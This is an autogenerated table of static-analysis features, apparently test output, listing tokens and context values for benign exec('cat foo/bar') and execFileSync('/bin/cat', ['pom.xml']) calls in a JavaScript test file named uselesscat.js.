autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:36:94:38 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:36:94:38 | out | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:36:94:38 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:36:94:38 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:1:96:4 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:1:96:4 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:1:96:4 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:1:96:53 | exceptional return of exec("c ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:1:96:53 | exceptional return of exec("c ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:1:96:53 | exceptional return of exec("c ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:1:96:53 | exec("c ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:1:96:53 | exec("c ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:1:96:53 | exec("c ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:6:96:18 | "cat foo/bar" | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:6:96:18 | "cat foo/bar" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:6:96:18 | "cat foo/bar" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:6:96:18 | "cat foo/bar" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:6:96:18 | "cat foo/bar" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:6:96:18 | "cat foo/bar" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | 'arguments' object of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | 'arguments' object of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | (err, o ... g(out)} | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | (err, o ... g(out)} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | (err, o ... g(out)} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | (err, o ... g(out)} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | (err, o ... g(out)} | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | (err, o ... g(out)} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | exceptional return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | exceptional return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:21:96:52 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:22:96:24 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:22:96:24 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:22:96:24 | err | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:22:96:24 | err | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:22:96:24 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:27:96:29 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:27:96:29 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:27:96:29 | out | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:27:96:29 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:27:96:29 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:27:96:29 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:27:96:29 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:27:96:29 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:27:96:29 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:27:96:29 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:42 | console | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:42 | console | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:42 | console | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:42 | console | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:42 | console | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:46 | console.log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:46 | console.log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:46 | console.log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:46 | console.log | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:46 | console.log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:51 | console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:51 | console.log(out) | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:51 | console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:51 | console.log(out) | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:51 | console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:51 | exceptional return of console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:51 | exceptional return of console.log(out) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:51 | exceptional return of console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:51 | exceptional return of console.log(out) | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:51 | exceptional return of console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:44:96:46 | log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:44:96:46 | log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:44:96:46 | log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:44:96:46 | log | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:44:96:46 | log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:48:96:50 | out | CalleeFlexibleAccessPath | console.log | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:48:96:50 | out | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:48:96:50 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:48:96:50 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:48:96:50 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:48:96:50 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:48:96:50 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:48:96:50 | out | receiverName | console | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:1:98:4 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:1:98:4 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:1:98:4 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:1:98:55 | exceptional return of exec("c ... h(out)) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:1:98:55 | exceptional return of exec("c ... h(out)) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:1:98:55 | exceptional return of exec("c ... h(out)) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:1:98:55 | exec("c ... h(out)) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:1:98:55 | exec("c ... h(out)) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:1:98:55 | exec("c ... h(out)) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:6:98:18 | "cat foo/bar" | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:6:98:18 | "cat foo/bar" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:6:98:18 | "cat foo/bar" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:6:98:18 | "cat foo/bar" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:6:98:18 | "cat foo/bar" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:6:98:18 | "cat foo/bar" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | 'arguments' object of anonymous function | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | 'arguments' object of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | (err, o ... th(out) | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | (err, o ... th(out) | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | (err, o ... th(out) | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | (err, o ... th(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | (err, o ... th(out) | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | (err, o ... th(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | exceptional return of anonymous function | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | exceptional return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | return of anonymous function | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:21:98:54 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:22:98:24 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:22:98:24 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:22:98:24 | err | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:22:98:24 | err | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:22:98:24 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:27:98:29 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:27:98:29 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:27:98:29 | out | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:27:98:29 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:27:98:29 | out | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:27:98:29 | out | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:27:98:29 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:27:98:29 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:27:98:29 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:27:98:29 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:35:98:49 | doSomethingWith | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:35:98:49 | doSomethingWith | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:35:98:49 | doSomethingWith | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:35:98:49 | doSomethingWith | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:35:98:49 | doSomethingWith | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:35:98:54 | doSomethingWith(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:35:98:54 | doSomethingWith(out) | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:35:98:54 | doSomethingWith(out) | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:35:98:54 | doSomethingWith(out) | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:35:98:54 | doSomethingWith(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:35:98:54 | exceptional return of doSomethingWith(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:35:98:54 | exceptional return of doSomethingWith(out) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:35:98:54 | exceptional return of doSomethingWith(out) | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:35:98:54 | exceptional return of doSomethingWith(out) | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:35:98:54 | exceptional return of doSomethingWith(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:51:98:53 | out | CalleeFlexibleAccessPath | doSomethingWith | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:51:98:53 | out | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:51:98:53 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:51:98:53 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:51:98:53 | out | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:51:98:53 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:51:98:53 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:1:100:12 | execFileSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:1:100:12 | execFileSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:1:100:12 | execFileSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:1:100:56 | exceptional return of execFil ... ptions) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:1:100:56 | exceptional return of execFil ... ptions) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:1:100:56 | exceptional return of execFil ... ptions) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:1:100:56 | execFil ... ptions) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:1:100:56 | execFil ... ptions) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:1:100:56 | execFil ... ptions) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:14:100:23 | '/bin/cat' | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:14:100:23 | '/bin/cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:14:100:23 | '/bin/cat' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:14:100:23 | '/bin/cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:14:100:23 | '/bin/cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:14:100:23 | '/bin/cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:26:100:38 | [ 'pom.xml' ] | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:26:100:38 | [ 'pom.xml' ] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:26:100:38 | [ 'pom.xml' ] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:26:100:38 | [ 'pom.xml' ] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:26:100:38 | [ 'pom.xml' ] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:26:100:38 | [ 'pom.xml' ] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:28:100:36 | 'pom.xml' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:28:100:36 | 'pom.xml' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:28:100:36 | 'pom.xml' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:28:100:36 | 'pom.xml' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:28:100:36 | 'pom.xml' | fileImports | child_process cross-spawn exec express fs shelljs | +| 